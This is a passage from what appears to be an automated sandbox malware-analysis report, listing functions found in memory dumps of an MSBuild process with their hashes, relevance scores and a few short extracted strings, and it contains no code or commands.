                                                      • Instruction ID: 229b01c2b855719d4442e1278005360a0cb8598199bb9c8b6cca4deb1eedd01c
                                                      • Opcode Fuzzy Hash: f06ebc08cc9a3df6e37733a918e4596796b788f801ff1e85dfc67d31d66d353b
                                                      • Instruction Fuzzy Hash: 4E2160755093C09FC703DF24D990711BFB1EB46214F29C5DBD8898F2A7D27A980ACB62
                                                      Function 00C016B8 Relevance: .1, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bf9b1d0ef724ef12319188ae9d856497f4787b882e15ec596553fd714c5cae6a
                                                      • Instruction ID: 83015b9342a11ba5852100171b5d1e46fe3655d61463237c4dda5384f8c201e6
                                                      • Opcode Fuzzy Hash: bf9b1d0ef724ef12319188ae9d856497f4787b882e15ec596553fd714c5cae6a
                                                      • Instruction Fuzzy Hash: 3021A1746001014FDF12AB28F8A4B5E775EEB54344F205A25D41ACB3ADDB28DE46CB92
                                                      Function 00C04FA0 Relevance: .1, Instructions: 68COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2a088fcaa2dc1ab4f462da2be5c860d327c6bebcddcec2ce0fc1008f5a50badb
                                                      • Instruction ID: 93e852cd8786d111d18eb9a3be1dec08e7c4ac418a1a356cc8439f8017496d5e
                                                      • Opcode Fuzzy Hash: 2a088fcaa2dc1ab4f462da2be5c860d327c6bebcddcec2ce0fc1008f5a50badb
                                                      • Instruction Fuzzy Hash: D2211674B00209CFDB14EB78C958AAE77F1AB8D305B100468E506EB3A4EF329D00CB91
                                                      Function 00C00848 Relevance: .1, Instructions: 62COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: aea27cf2bf5a71b70a59971f335dbc93d5e84dd542976685f61514f44da5d43e
                                                      • Instruction ID: 0ec0c1aa3a49315a71c59d37a72c777dc6433e55810fedfc43c22445025c6978
                                                      • Opcode Fuzzy Hash: aea27cf2bf5a71b70a59971f335dbc93d5e84dd542976685f61514f44da5d43e
                                                      • Instruction Fuzzy Hash: 7F11BF30B002048FEF54AA79D41472A33A5FB81350F328A7AD016CB2D5DA25DE85CBC1
                                                      Function 00C00838 Relevance: .1, Instructions: 61COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 649d9c17b10fa0eb442c1e991b7e107170fdcdb4432c40efe951d7e59a6ccf80
                                                      • Instruction ID: da5e922f797ba4ec02ec40b58cbaa985171fe6b6ab580b0c549090ef02a7949c
                                                      • Opcode Fuzzy Hash: 649d9c17b10fa0eb442c1e991b7e107170fdcdb4432c40efe951d7e59a6ccf80
                                                      • Instruction Fuzzy Hash: A5110630B002008FEF115A79D91136A7365FB51314F36CA7AD416CB2D6DA24CE46CBD1
                                                      Function 00C014A0 Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: eb7b5edebe6f17c19b46438a2bca89389907ea7b2673ba44d5c4ac11182ac820
                                                      • Instruction ID: 9aa110d3f90989596085451522d02fdbff60c2125c5993dc5c07396c177237f3
                                                      • Opcode Fuzzy Hash: eb7b5edebe6f17c19b46438a2bca89389907ea7b2673ba44d5c4ac11182ac820
                                                      • Instruction Fuzzy Hash: BD016D31A012158FCF21EFB888412ADBBE4AB49310F290479E906EB281E635E941DBA1
                                                      Function 00C0A6D3 Relevance: .0, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c0dafa8c183260aa38c9cbfd51d70cfec4ed67fe834b0e222b400091a73068ce
                                                      • Instruction ID: 10797b0dfd124e2bcd91e23e3289347638dd4567bafb42d69fb991afdcd80b4f
                                                      • Opcode Fuzzy Hash: c0dafa8c183260aa38c9cbfd51d70cfec4ed67fe834b0e222b400091a73068ce
                                                      • Instruction Fuzzy Hash: 7A019631A002048BDF04DF69DA84B8AB7B5FF84311F54C664D80C5F2AADB70ED46C791
                                                      Function 00C08F20 Relevance: .0, Instructions: 39COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4dc6c69f8f5b1e2457ea771619091a6f9f5135e433798555cb28e0fc34ecad32
                                                      • Instruction ID: 1e3285310648e3d042ecaf7094093316add149c5d8865cc17f8d999396a803d6
                                                      • Opcode Fuzzy Hash: 4dc6c69f8f5b1e2457ea771619091a6f9f5135e433798555cb28e0fc34ecad32
                                                      • Instruction Fuzzy Hash: 8301DF356002448FCB06EB78FA9098D3BB5EF41304B1012A8C0045B2AADF356E0AC782
                                                      Function 00C07EC0 Relevance: .0, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3a99edc2372f2881b4a9d3d10ca72e93d426b73e92c81d362ce05454348b9814
                                                      • Instruction ID: 2be7879401c9b3d202c8e502c46404c28042501fbb78dc4d08f3cb22d968ee12
                                                      • Opcode Fuzzy Hash: 3a99edc2372f2881b4a9d3d10ca72e93d426b73e92c81d362ce05454348b9814
                                                      • Instruction Fuzzy Hash: C8F01435B001148FCB04EB64D598AAD77B2EF88319F1044A8E50A9B3A4CB35AD42CB40
                                                      Function 00C08F30 Relevance: .0, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9b41de5232137bb2dba42749316130eb8d2d0fd11b51cda24652375cbf0dbb23
                                                      • Instruction ID: ab54f425abd35d1c0b1613177a940cb1e1d4b5d35eed6287e6e090270ed2ac1e
                                                      • Opcode Fuzzy Hash: 9b41de5232137bb2dba42749316130eb8d2d0fd11b51cda24652375cbf0dbb23
                                                      • Instruction Fuzzy Hash: 3FF01D34A002099FCB06FFB4FA9199D7BB9EF40304F505678C4049B268DB356E098B95

                                                      Non-executed Functions

                                                      Function 05FA5670 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3348893880.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5fa0000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                      • API String ID: 0-2843079600
                                                      • Opcode ID: 532cbbf12384aadd9a9a7234237f90404dc3bf59879d24554a7e07d0551e0dd3
                                                      • Instruction ID: 7c6e67146a0fd34269186a5f184d6cb0ff1022a5a49c191a5a6c424ab181daa0
                                                      • Opcode Fuzzy Hash: 532cbbf12384aadd9a9a7234237f90404dc3bf59879d24554a7e07d0551e0dd3
                                                      • Instruction Fuzzy Hash: D8123C71E012198FDF24EF74C994AAEB7F6BF88304F208969D40AAB255DB349D45CB41
                                                      Function 05FA3CC0 Relevance: 2.9, Strings: 2, Instructions: 402COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3348893880.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5fa0000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: XPbq$\Obq
                                                      • API String ID: 0-409418754
                                                      • Opcode ID: 35814db516af7907f51fbf1aa3289d5bdd58bc763f880527121c6daa60465d39
                                                      • Instruction ID: 70c6be9fef2c17e5bcd773d0194fea2f9d5c27d83211e765a5d4684f807e44bf
                                                      • Opcode Fuzzy Hash: 35814db516af7907f51fbf1aa3289d5bdd58bc763f880527121c6daa60465d39
                                                      • Instruction Fuzzy Hash: 10D1D372B101148FDF14DB68C494ABEB7F2FF88710F25886AE40ADB395CA79DC418792
                                                      Function 00C0E439 Relevance: 2.0, Instructions: 1956COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cd642b3e22dd51bb87bcb6bb06ed89aadc658e9cbca478cf34e65193b210bf83
                                                      • Instruction ID: e67d891a88dcabd3dbe1a019c24e6923eb5fd5e9c0581fb6d12739b0db9e5678
                                                      • Opcode Fuzzy Hash: cd642b3e22dd51bb87bcb6bb06ed89aadc658e9cbca478cf34e65193b210bf83
                                                      • Instruction Fuzzy Hash: 74230A31D10B1A8ECB11EF68C8945ADF7B1FF99300F15C79AE458A7261EB70AAC5CB41
                                                      Function 05FAC370 Relevance: 1.8, Strings: 1, Instructions: 569COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3348893880.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_5fa0000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PH]q
                                                      • API String ID: 0-3168235125
                                                      • Opcode ID: 2229b209ba50ff9e5c54005aa4838b66d9ab093f3e225fd839adbaacd2aa8bcc
                                                      • Instruction ID: a59deb4009899232ab4404e7a77bf60e9a39fc184d2eaee4d6ebb191e3e1a757
                                                      • Opcode Fuzzy Hash: 2229b209ba50ff9e5c54005aa4838b66d9ab093f3e225fd839adbaacd2aa8bcc
                                                      • Instruction Fuzzy Hash: DD22D071B102058FDB14DB68D594A6EB7F2FF88310F208869E40ADB365DB39EC45CB92
                                                      Function 00C041D0 Relevance: .3, Instructions: 281COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3345806135.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_c00000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 39ca7c4f61c7d1e1e68dfbfdfb4a65107b3e9d41b5d6072a9e09d7a5b70951b0
                                                      • Instruction ID: 466c6c1aebdbc9badef1ab8b77d36909cce9ed94fcf2fa3b01e2a8fad6047f4e
                                                      • Opcode Fuzzy Hash: 39ca7c4f61c7d1e1e68dfbfdfb4a65107b3e9d41b5d6072a9e09d7a5b70951b0
                                                      • Instruction Fuzzy Hash: 88B140B0E00209DFDF14CFA9D9857AEBBF2BF88314F148129E515E7294EB749946CB81
                                                      Function 060FA198 Relevance: .3, Instructions: 264COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3349256813.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_60f0000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e1893a46701433e679e9e8b1cad19f2564f7ee589cd4c3a06798c56c56127a1d
                                                      • Instruction ID: f7744f259f0af6f74f55b8d7c83cbffe02caebabf02b2333ed4449fde3aaff02
                                                      • Opcode Fuzzy Hash: e1893a46701433e679e9e8b1cad19f2564f7ee589cd4c3a06798c56c56127a1d
                                                      • Instruction Fuzzy Hash: 91A16E32F50219CFCF85DFA5C8405DEBBB2FF84300B15456AE91AAB261DB76E945CB80
                                                      Function 060FBC48 Relevance: .2, Instructions: 217COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3349256813.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_60f0000_MSBuild.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8299e34fcc997b5e2d5f2c108cdc13b969a6137f31bb9abfe905e985fa143349
                                                      • Instruction ID: a368c8ed13aef8f9c76d45fe39801ed655fe6eb4f9925b7eab59f548dd1364db
                                                      • Opcode Fuzzy Hash: 8299e34fcc997b5e2d5f2c108cdc13b969a6137f31bb9abfe905e985fa143349
                                                      • Instruction Fuzzy Hash: 3FC117B1C10747ABD710CF65E8481897BB1FBA5328F504319D2612B2E9DBBC19ABCF48